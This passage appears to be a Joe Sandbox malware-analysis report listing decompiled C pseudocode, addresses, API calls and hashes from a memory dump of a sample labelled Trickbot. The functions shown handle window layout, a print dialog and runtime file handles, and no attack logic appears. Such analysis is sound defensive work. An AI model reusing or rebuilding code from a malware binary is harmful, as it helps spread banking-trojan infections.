							asm("movsd");
							_t283 = _v44.left;
							asm("cdq");
							_v20 = _t225 + _t283;
							_v28 = _t283;
							_t250 = _v44.right - _t283 - _t248 >> 1;
							_t161 = _a8 - (_v44.right - _t283 - _t248 >> 1);
							_v24 = _t161;
							_v16 = _v8 + _t161;
						} else {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t291 = _v44.top;
							_v24 = _t291;
							asm("cdq");
							_t250 = _v44.bottom - _t291 - _t248 >> 1;
							_t191 = _a4 - (_v44.bottom - _t291 - _t248 >> 1);
							_v28 = _t191;
							_v20 = _t225 + _t191;
							_v16 = _v8 + _t291;
						}
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t162 = _t219 + 0x48;
						_push(0);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t287 = 0xc40000;
						_push(0xc40000);
					} else {
						GetWindowRect( *(_t150 + 0x1c),  &_v60);
						 *((intOrPtr*)(_t219 + 4)) = _a4;
						 *((intOrPtr*)(_t219 + 8)) = _a8;
						_t198 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0xa);
						_t200 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0xffffffff, 0x10);
						_t236 = _v60.top;
						_v44.top = _t236;
						_v44.bottom =  *((intOrPtr*)(_t198 + 4)) + _t236;
						_v16 =  *((intOrPtr*)(_t200 + 4));
						_t202 = _v60.left;
						_v44.right =  *_t198 + _t202;
						_v44.left = _t202;
						_t250 =  *_t200 + _t202;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_v44.left = _t202;
						_v44.right =  *_t200 + _t202;
						_v44.top = _t236;
						_v44.bottom = _v16 + _t236;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						goto L6;
					}
				} else {
					GetWindowRect( *(_t150 + 0x1c),  &_v60);
					 *((intOrPtr*)(_t219 + 4)) = _a4;
					 *((intOrPtr*)(_t219 + 8)) = _a8;
					_t209 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0xa);
					_t211 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 0x10);
					_v12 =  *_t211;
					_v8 =  *((intOrPtr*)(_t211 + 4));
					_t214 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t219 + 0x68)))) + 0xbc))( &_v20, 0, 6);
					_t242 = _v60.top;
					_v44.top = _t242;
					_v44.bottom =  *((intOrPtr*)(_t209 + 4)) + _t242;
					_v16 =  *((intOrPtr*)(_t214 + 4));
					_t216 = _v60.left;
					_v44.right =  *_t209 + _t216;
					_v44.left = _t216;
					_t250 =  *_t214 + _t216;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _v12 + _t216;
					_v44.top = _t242;
					_v44.bottom = _v8 + _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t308 = _v16 + _t242;
					_v44.left = _t216;
					_v8 = _t308;
					_v44.bottom = _t308;
					_v44.right = _t250;
					_v44.top = _t242;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v44.left = _t216;
					_v44.right = _t250;
					_v44.top = _t242;
					_v44.bottom = _v8;
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t287 = 0xc40000;
					_push(0);
					_push(0xc40000);
					_t162 = _t219 + 0x48;
				}
				_push(_t162);
				E004301F7();
				_push(0);
				_t263 = _t219 + 0x58;
				_push(_t287);
				_push(_t263);
				E004301F7();
				_t165 =  *0x44b30c; // 0x2
				_t167 =  *0x44b308; // 0x2
				InflateRect(_t219 + 0x48,  ~_t167,  ~_t165);
				_t171 =  *0x44b30c; // 0x2
				_t173 =  *0x44b308; // 0x2
				InflateRect(_t263,  ~_t173,  ~_t171);
				_t264 = _a8;
				_t289 = _a4;
				E00429C4E(_t219 + 0x28, _a4, _a8);
				E00429C4E(_t219 + 0x38, _a4, _a8);
				E00429C4E(_t219 + 0x48, _t289, _t264);
				E00429C4E(_t219 + 0x58, _t289, _t264);
				 *((intOrPtr*)(_t219 + 0x74)) = E0042A860();
				E0042A062(_t219, _t289, _t264);
				return E0042A9BF(_t219, _t250);
			}

0x00429d16
0x00429d1a
0x00429d24
0x00429d2f
0x00429d3c
0x00429d42
0x00429d42
0x00429d47
0x00429d4a
0x00429d50
0x00429e3d
0x00429ef7
0x00429f03
0x00429f0e
0x00429f16
0x00429f18
0x00429f24
0x00429f2a
0x00429f30
0x00429f37
0x00429f3a
0x00429f7b
0x00429f7c
0x00429f80
0x00429f81
0x00429f82
0x00429f8c
0x00429f8f
0x00429f9a
0x00429f9d
0x00429f9f
0x00429fa6
0x00429fa9
0x00429f3c
0x00429f42
0x00429f43
0x00429f47
0x00429f48
0x00429f49
0x00429f51
0x00429f54
0x00429f5c
0x00429f5e
0x00429f60
0x00429f68
0x00429f70
0x00429f70
0x00429fac
0x00429fad
0x00429fae
0x00429faf
0x00429fb0
0x00429fb8
0x00429fba
0x00429fbb
0x00429fbc
0x00429fbd
0x00429fc4
0x00429fc5
0x00429fc6
0x00429fc7
0x00429fc8
0x00429fcd
0x00429e43
0x00429e4a
0x00429e56
0x00429e5c
0x00429e69
0x00429e81
0x00429e89
0x00429e8e
0x00429e94
0x00429e97
0x00429e9a
0x00429ea2
0x00429ea8
0x00429eab
0x00429ead
0x00429eae
0x00429eaf
0x00429eb0
0x00429eb7
0x00429eb8
0x00429eb9
0x00429eba
0x00429ebb
0x00429ec9
0x00429ecc
0x00429ecf
0x00429ed2
0x00429ed3
0x00429ed4
0x00429ed5
0x00000000
0x00429ed9
0x00429d56
0x00429d5d
0x00429d69
0x00429d6f
0x00429d7c
0x00429d94
0x00429d9e
0x00429daa
0x00429db2
0x00429dba
0x00429dbf
0x00429dc5
0x00429dc8
0x00429dcb
0x00429dd3
0x00429dd9
0x00429ddc
0x00429dde
0x00429ddf
0x00429de0
0x00429de1
0x00429dea
0x00429ded
0x00429df5
0x00429df8
0x00429dfe
0x00429dff
0x00429e00
0x00429e01
0x00429e08
0x00429e0a
0x00429e0d
0x00429e10
0x00429e16
0x00429e19
0x00429e1c
0x00429e1d
0x00429e1e
0x00429e1f
0x00429e20
0x00429e26
0x00429e29
0x00429e2c
0x00429edc
0x00429edc
0x00429edd
0x00429ede
0x00429edf
0x00429ee0
0x00429ee5
0x00429ee7
0x00429ee8
0x00429ee8
0x00429fce
0x00429fcf
0x00429fd4
0x00429fd6
0x00429fd9
0x00429fda
0x00429fdb
0x00429fe0
0x00429fee
0x00429ffa
0x00429ffc
0x0042a004
0x0042a00d
0x0042a00f
0x0042a012
0x0042a01b
0x0042a026
0x0042a031
0x0042a03c
0x0042a04c
0x0042a04f
0x0042a05f

APIs

Part of subcall function 0042A5EE: PeekMessageA.USER32(?,00000000,0000000F,0000000F,00000000), ref: 0042A60B
Part of subcall function 0042A5EE: GetMessageA.USER32(0000000F,00000000,0000000F,0000000F), ref: 0042A619
Part of subcall function 0042A5EE: DispatchMessageA.USER32(?), ref: 0042A62C
Part of subcall function 0042A5EE: SetRectEmpty.USER32(?), ref: 0042A655
Part of subcall function 0042A5EE: GetDesktopWindow.USER32 ref: 0042A66D
Part of subcall function 0042A5EE: LockWindowUpdate.USER32(?), ref: 0042A67E
Part of subcall function 0042A5EE: GetDCEx.USER32(?,00000000,00000003), ref: 0042A695

Part of subcall function 00421402: GetModuleHandleA.KERNEL32(GDI32.DLL,?,00429D3A), ref: 0042140A
Part of subcall function 00421402: GetProcAddress.KERNEL32(00000000,GetLayout), ref: 00421416

GetWindowRect.USER32(?,?), ref: 00429D5D

Part of subcall function 00421438: GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,00429D47,00000000), ref: 00421441
Part of subcall function 00421438: GetProcAddress.KERNEL32(00000000,SetLayout,?,?,00429D47,00000000), ref: 0042144F

GetWindowRect.USER32(?,?), ref: 00429E4A

Part of subcall function 00429C4E: OffsetRect.USER32(?,?,?), ref: 00429C85

Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A08B
Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A095
Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A09F
Part of subcall function 0042A062: OffsetRect.USER32(?,?,?), ref: 0042A0A9

Part of subcall function 0042A9BF: GetCapture.USER32 ref: 0042A9D0
Part of subcall function 0042A9BF: SetCapture.USER32(?), ref: 0042A9E0
Part of subcall function 0042A9BF: GetCapture.USER32 ref: 0042A9EC
Part of subcall function 0042A9BF: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0042AA06
Part of subcall function 0042A9BF: DispatchMessageA.USER32(?), ref: 0042AA38
Part of subcall function 0042A9BF: GetCapture.USER32 ref: 0042AA96

GetWindowRect.USER32(?,?), ref: 00429EF7
InflateRect.USER32(?,00000002,00000002), ref: 00429FFA
InflateRect.USER32(?,00000002,00000002), ref: 0042A00D

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$MessageOffsetWindow$Capture$AddressDispatchHandleInflateModuleProc$DesktopEmptyLockPeekUpdate
String ID:
API String ID: 2041477333-0
Opcode ID: d3cf26c2436fce6822bf8107be96c29d7597f3932fe5dec81f97b2943589c066
Instruction ID: 72b4e11711a5a85c3a3e078067ac1a4e9571446fc90aa547d006c906365034d3
Opcode Fuzzy Hash: d3cf26c2436fce6822bf8107be96c29d7597f3932fe5dec81f97b2943589c066
Instruction Fuzzy Hash: 41D13771A006189FCF05CF98C880ADEBBB6AF49310F1581AAED05BB255D7B1AE45CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00425EDA, Relevance: 7.8, APIs: 5, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00425EDA(intOrPtr* __ecx) {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				long _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char _v44;
				struct tagRECT _v60;
				struct HDWP__* _v92;
				intOrPtr _t163;
				void* _t181;
				void* _t187;
				signed int _t191;
				intOrPtr _t198;
				void* _t207;
				void* _t209;
				intOrPtr _t210;
				intOrPtr _t237;
				signed int _t245;
				intOrPtr _t248;
				signed int _t250;
				signed int _t251;
				intOrPtr* _t255;

				_t255 = __ecx;
				GetClientRect( *(__ecx + 0x1c),  &_v60);
				InflateRect( &_v60,  ~( *(_t255 + 0x60)),  ~( *(_t255 + 0x64)));
				 *((intOrPtr*)( *_t255 + 0x100))( &_v44);
				E00425C7C( *((intOrPtr*)(_t255 + 0x78)),  *((intOrPtr*)(_t255 + 0x6c)), _v36 - _v44,  *((intOrPtr*)(_t255 + 0x58)));
				E00425C7C( *((intOrPtr*)(_t255 + 0x7c)),  *((intOrPtr*)(_t255 + 0x68)), _v32 - _v40,  *((intOrPtr*)(_t255 + 0x5c)));
				_v92 = BeginDeferWindowPos(( *((intOrPtr*)(_t255 + 0x6c)) + 1) * ( *((intOrPtr*)(_t255 + 0x68)) + 1) + 1);
				_t163 =  *0x44b358; // 0x0
				_t206 = _v60.bottom - _t163 - _v32;
				_t245 = 0;
				_v24 = _v60.right - _t163 - _v36;
				_v20 = _v60.bottom - _t163 - _v32;
				if( *((intOrPtr*)(_t255 + 0x70)) != 0) {
					if( *((intOrPtr*)(_t255 + 0x74)) != 0) {
						_v8 = E0041B5B5(_t255, 0xea20);
						_t191 = E00425E44(_t255);
						asm("sbb edi, edi");
						_t254 =  ~( ~_t191);
						asm("sbb eax, eax");
						if(E0041B6A3(_v8, 0x18, ( ~( ~( ~_t191)) & 0x00000008) + 8, 0) != 0) {
							InvalidateRect( *(_v8 + 0x1c), 0, 1);
						}
						E0041B815(_v8, _t254);
						_t198 =  *0x44b358; // 0x0
						E00425D3C( &_v92, _v8, _t198 + _v36, _v32 + _t198, _v24, _t206, 1);
						_t163 =  *0x44b358; // 0x0
						_t245 = 0;
					}
					if( *((intOrPtr*)(_t255 + 0x70)) != _t245) {
						_t251 = 0;
						_v28 =  *((intOrPtr*)(_t255 + 0x48)) + _t163;
						_v8 = _v60.left;
						_v16 = _v32 + _t163;
						if( *((intOrPtr*)(_t255 + 0x6c)) > _t245) {
							do {
								_t47 = _t251 + 0xea00; // 0xea00
								_t187 = E0041B5B5(_t255, _t47);
								_t210 =  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x78)) + 8 + (_t251 + _t251 * 2) * 4));
								if(_t251 == 0 &&  *((intOrPtr*)(_t255 + 0x6c)) <  *((intOrPtr*)(_t255 + 0x44))) {
									_t237 = _v28;
									_v8 = _v8 + _t237;
									_t210 = _t210 - _t237;
								}
								E00425D3C( &_v92, _t187, _v8, _v16, _t210, _v20, 1);
								_v8 = _v8 + _t210 +  *((intOrPtr*)(_t255 + 0x58));
								_t251 = _t251 + 1;
							} while (_t251 <  *((intOrPtr*)(_t255 + 0x6c)));
							_t163 =  *0x44b358; // 0x0
							_t245 = 0;
						}
					}
				}
				if( *((intOrPtr*)(_t255 + 0x74)) != _t245) {
					_t209 =  *((intOrPtr*)(_t255 + 0x4c)) + _t163;
					_v28 = _t163 + _v36;
					_t250 = 0;
					_v8 = _v60.top;
					if( *((intOrPtr*)(_t255 + 0x68)) > _t245) {
						do {
							_t74 = _t250 + 0xea10; // 0xea10
							_t181 = E0041B5B5(_t255, _t74);
							_v12 =  *((intOrPtr*)( *((intOrPtr*)(_t255 + 0x7c)) + 8 + (_t250 + _t250 * 2) * 4));
							if(_t250 == 0 &&  *((intOrPtr*)(_t255 + 0x68)) <  *((intOrPtr*)(_t255 + 0x40))) {
								_v8 = _v8 + _t209;
								_v12 = _v12 - _t209;
							}
							E00425D3C( &_v92, _t181, _v28, _v8, _v24, _v12, 1);
							_v8 = _v8 +  *((intOrPtr*)(_t255 + 0x5c)) + _v12;
							_t250 = _t250 + 1;
						} while (_t250 <  *((intOrPtr*)(_t255 + 0x68)));
						_t245 = 0;
					}
				}
				_v20 = _v60.left;
				_v12 = _t245;
				if( *((intOrPtr*)(_t255 + 0x6c)) > _t245) {
					_v24 = _t245;
					do {
						_t207 = 0;
						_t248 =  *((intOrPtr*)(_v24 +  *((intOrPtr*)(_t255 + 0x78)) + 8));
						_v8 = _v60.top;
						if( *((intOrPtr*)(_t255 + 0x68)) > _t245) {
							_v16 = _t245;
							do {
								_v28 =  *((intOrPtr*)(_v16 +  *((intOrPtr*)(_t255 + 0x7c)) + 8));
								E00425D3C( &_v92, E00424B00(_t255, _t207, _v12), _v20, _v8, _t248, _v28, 0);
								_v16 = _v16 + 0xc;
								_v8 = _v8 +  *((intOrPtr*)(_t255 + 0x5c)) + _v28;
								_t207 = _t207 + 1;
							} while (_t207 <  *((intOrPtr*)(_t255 + 0x68)));
							_t245 = 0;
						}
						_v24 = _v24 + 0xc;
						_v20 = _v20 + _t248 +  *((intOrPtr*)(_t255 + 0x58));
						_v12 = _v12 + 1;
					} while (_v12 <  *((intOrPtr*)(_t255 + 0x6c)));
				}
				if(_v92 != _t245) {
					EndDeferWindowPos(_v92);
					_t245 = 0;
				}
				return  *((intOrPtr*)( *_t255 + 0x110))(_t245, _v36, _v32);
			}

0x00425ee6
0x00425eec
0x00425f02
0x00425f10
0x00425f26
0x00425f3b
0x00425f59
0x00425f5c
0x00425f68
0x00425f6b
0x00425f70
0x00425f73
0x00425f76
0x00425f7f
0x00425f8f
0x00425f92
0x00425f9e
0x00425fa2
0x00425fa8
0x00425fba
0x00425fc6
0x00425fc6
0x00425fd0
0x00425fd5
0x00425ff3
0x00425ff8
0x00425ffd
0x00425ffd
0x00426002
0x00426007
0x0042600b
0x00426011
0x0042601c
0x0042601f
0x00426021
0x00426021
0x0042602a
0x00426037
0x0042603b
0x00426045
0x00426048
0x0042604b
0x0042604b
0x0042605e
0x00426066
0x00426069
0x0042606a
0x0042606f
0x00426074
0x00426074
0x0042601f
0x00426002
0x00426079
0x00426081
0x00426085
0x0042608b
0x00426090
0x00426093
0x00426095
0x00426095
0x0042609e
0x004260af
0x004260b2
0x004260bc
0x004260bf
0x004260bf
0x004260d5
0x004260e0
0x004260e3
0x004260e4
0x004260e9
0x004260e9
0x00426093
0x004260f1
0x004260f4
0x004260f7
0x004260f9
0x004260fc
0x00426102
0x00426107
0x0042610e
0x00426111
0x00426113
0x00426116
0x00426126
0x0042613f
0x00426147
0x0042614e
0x00426151
0x00426152
0x00426157
0x00426157
0x0042615c
0x00426160
0x00426163
0x00426169
0x004260fc
0x00426171
0x00426176
0x0042617c
0x0042617c
0x00426193

APIs

GetClientRect.USER32(?,?), ref: 00425EEC
InflateRect.USER32(?,?,?), ref: 00425F02
BeginDeferWindowPos.USER32(?), ref: 00425F4D
InvalidateRect.USER32(?,00000000,00000001), ref: 00425FC6
EndDeferWindowPos.USER32(?), ref: 00426176

Part of subcall function 0041B5B5: GetDlgItem.USER32(?,?), ref: 0041B5C3

Part of subcall function 00425E44: GetClientRect.USER32(?,?), ref: 00425E65
Part of subcall function 00425E44: GetParent.USER32(?), ref: 00425E7D
Part of subcall function 00425E44: GetClientRect.USER32(?,?), ref: 00425EA7

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Rect$Client$DeferWindow$BeginInflateInvalidateItemParent
String ID:
API String ID: 939197390-0
Opcode ID: 08313d4aa41f99e8e23b58f45aee9a0801ce46be4314a808e7737648b299fb2c
Instruction ID: 2f33174862d9900589927dacb821746555d53b4f1962221192ff332719b8dc40
Opcode Fuzzy Hash: 08313d4aa41f99e8e23b58f45aee9a0801ce46be4314a808e7737648b299fb2c
Instruction Fuzzy Hash: A1A14971A00619EFCF15CFA9D9819AEBBF6FF48304F10882EE142A7660D734A981DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00435CD0, Relevance: 7.7, APIs: 5, Instructions: 152
stringCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00435CD0(void* __ecx) {
				intOrPtr _t67;
				void* _t69;
				void* _t72;
				CHAR** _t77;
				intOrPtr _t90;
				signed int _t112;
				void* _t117;
				void* _t129;
				intOrPtr* _t132;
				signed short* _t134;
				intOrPtr* _t135;
				intOrPtr* _t136;
				void* _t137;

				E00405340(E00438196, _t137);
				_t129 = __ecx;
				if( *((intOrPtr*)(_t137 + 8)) != 0) {
					L20:
					_push(0);
					_push(0x14000c);
					_push(1);
					E00415837(_t137 - 0x160);
					 *(_t137 - 4) = 2;
					E00415AA7(_t137 - 0x160);
					_t65 =  *((intOrPtr*)(_t129 + 0x94));
					if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
						E00422790(_t65);
					}
					_t66 =  *((intOrPtr*)(_t129 + 0x98));
					_t132 = _t129 + 0x98;
					if( *((intOrPtr*)(_t129 + 0x98)) != 0) {
						E00422790(_t66);
					}
					_t67 =  *((intOrPtr*)(_t137 - 0x104));
					 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t129 + 0x94)) =  *((intOrPtr*)(_t67 + 8));
					 *_t132 =  *((intOrPtr*)(_t67 + 0xc));
					_t117 = _t137 - 0x160;
					L25:
					_t69 = E00417440(_t117);
					L26:
					 *[fs:0x0] =  *((intOrPtr*)(_t137 - 0xc));
					return _t69;
				}
				_t72 =  *(__ecx + 0x98);
				if(_t72 == 0) {
					goto L20;
				}
				_t69 = GlobalLock(_t72);
				_t134 = _t69;
				if((_t134[3] & 0x00000001) == 0) {
					goto L26;
				}
				_push(0);
				_push(0x14000c);
				_push(1);
				E00415837(_t137 - 0xbc);
				 *(_t137 - 4) = 0;
				E00415AA7(_t137 - 0xbc);
				if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
					_t77 = E004159EE(_t137 - 0xbc, _t137 - 0x10);
					 *(_t137 - 4) = 1;
					if(lstrcmpA(_t134 + ( *_t134 & 0x0000ffff),  *_t77) != 0) {
						L10:
						_t112 = 1;
						L11:
						 *(_t137 - 4) =  *(_t137 - 4) & 0x00000000;
						E00417EC8(_t137 - 0x10);
						if(_t112 == 0) {
							_t83 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 8)) != 0) {
								E00422790(_t83);
							}
							_t85 =  *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc));
							if( *((intOrPtr*)( *((intOrPtr*)(_t137 - 0x60)) + 0xc)) != 0) {
								E00422790(_t85);
							}
						} else {
							_t88 =  *((intOrPtr*)(_t129 + 0x94));
							_t135 = _t129 + 0x94;
							if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
								E00422790(_t88);
							}
							E00422790( *((intOrPtr*)(_t129 + 0x98)));
							_t90 =  *((intOrPtr*)(_t137 - 0x60));
							 *_t135 =  *((intOrPtr*)(_t90 + 8));
							 *((intOrPtr*)(_t129 + 0x98)) =  *((intOrPtr*)(_t90 + 0xc));
						}
						L19:
						 *(_t137 - 4) =  *(_t137 - 4) | 0xffffffff;
						_t117 = _t137 - 0xbc;
						goto L25;
					}
					 *((char*)(_t137 + 0xb)) = lstrcmpA(_t134 + (_t134[1] & 0x0000ffff),  *(E00415A2B(_t137 - 0xbc, _t137 - 0x14))) != 0;
					E00417EC8(_t137 - 0x14);
					if( *((char*)(_t137 + 0xb)) != 0) {
						goto L10;
					}
					_t112 = lstrcmpA & 0xffffff00 | lstrcmpA(_t134 + (_t134[2] & 0x0000ffff),  *(E00415A69(_t137 - 0xbc, _t137 - 0x18))) != 0x00000000;
					E00417EC8(_t137 - 0x18);
					if(_t112 == 0) {
						goto L11;
					}
					goto L10;
				}
				_t105 =  *((intOrPtr*)(_t129 + 0x94));
				_t136 = _t129 + 0x94;
				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
					E00422790(_t105);
				}
				E00422790( *((intOrPtr*)(_t129 + 0x98)));
				 *_t136 = 0;
				 *((intOrPtr*)(_t129 + 0x98)) = 0;
				goto L19;
			}

0x00435cd5
0x00435ce8
0x00435cea
0x00435e5a
0x00435e5a
0x00435e5b
0x00435e60
0x00435e68
0x00435e73
0x00435e7a
0x00435e7f
0x00435e87
0x00435e8a
0x00435e8a
0x00435e8f
0x00435e95
0x00435e9d
0x00435ea0
0x00435ea0
0x00435ea5
0x00435eab
0x00435eb2
0x00435ebb
0x00435ebd
0x00435ec3
0x00435ec3
0x00435ec8
0x00435ece
0x00435ed6
0x00435ed6
0x00435cf0
0x00435cf8
0x00000000
0x00000000
0x00435cff
0x00435d05
0x00435d0b
0x00000000
0x00000000
0x00435d11
0x00435d12
0x00435d17
0x00435d1f
0x00435d2a
0x00435d2d
0x00435d38
0x00435d72
0x00435d84
0x00435d8d
0x00435de8
0x00435de8
0x00435dea
0x00435dea
0x00435df1
0x00435df8
0x00435e31
0x00435e36
0x00435e39
0x00435e39
0x00435e41
0x00435e46
0x00435e49
0x00435e49
0x00435dfa
0x00435dfa
0x00435e00
0x00435e08
0x00435e0b
0x00435e0b
0x00435e16
0x00435e1b
0x00435e21
0x00435e26
0x00435e26
0x00435e4e
0x00435e4e
0x00435e52
0x00000000
0x00435e52
0x00435dae
0x00435db2
0x00435dbb
0x00000000
0x00000000
0x00435ddc
0x00435ddf
0x00435de6
0x00000000
0x00000000
0x00000000
0x00435de6
0x00435d3a
0x00435d40
0x00435d48
0x00435d4b
0x00435d4b
0x00435d56
0x00435d5b
0x00435d5d
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00435CD5
lstrcmpA.KERNEL32(00000000,00000000,00000001,0014000C,00000000), ref: 00435D89
lstrcmpA.KERNEL32(?,00000000), ref: 00435DA7
lstrcmpA.KERNEL32(?,00000000,?), ref: 00435DD5

Part of subcall function 00422790: GlobalFlags.KERNEL32(?), ref: 0042279A
Part of subcall function 00422790: GlobalUnlock.KERNEL32(?), ref: 004227B1
Part of subcall function 00422790: GlobalFree.KERNEL32(?), ref: 004227BC

GlobalLock.KERNEL32(?,?,?,00000000), ref: 00435CFF

Part of subcall function 00415837: __EH_prolog.LIBCMT ref: 0041583C

Part of subcall function 00415AA7: PrintDlgA.COMDLG32(?,00435E7F,00000001,0014000C,00000000,?,?,00000000), ref: 00415AB1

Memory Dump Source

Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd

Similarity

API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
String ID:
API String ID: 2564375162-0
Opcode ID: 9601935cd9b4bd5de86417a5fda57c69fbda64f6f4c4ce77f7bbef73c29ee8e6
Instruction ID: d5b63fd21527c3633519b9647efd42377c1120a1cde25bf4170fca31900e56e5
Opcode Fuzzy Hash: 9601935cd9b4bd5de86417a5fda57c69fbda64f6f4c4ce77f7bbef73c29ee8e6
Instruction Fuzzy Hash: A7518C70A00B1AEBDB14EF75C985FDAB7B5AF08314F00445EE519A7252DB38EE84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004092E2, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E004092E2() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E0040511B(0x480);
				if(_t89 == 0) {
					E004052AF(0x1b);
				}
				 *0x44cfa0 = _t89;
				 *0x44d0a0 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x44cfa0; // 0x1354ae8
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x44cfa0; // 0x1354ae8
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x44d0a0);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
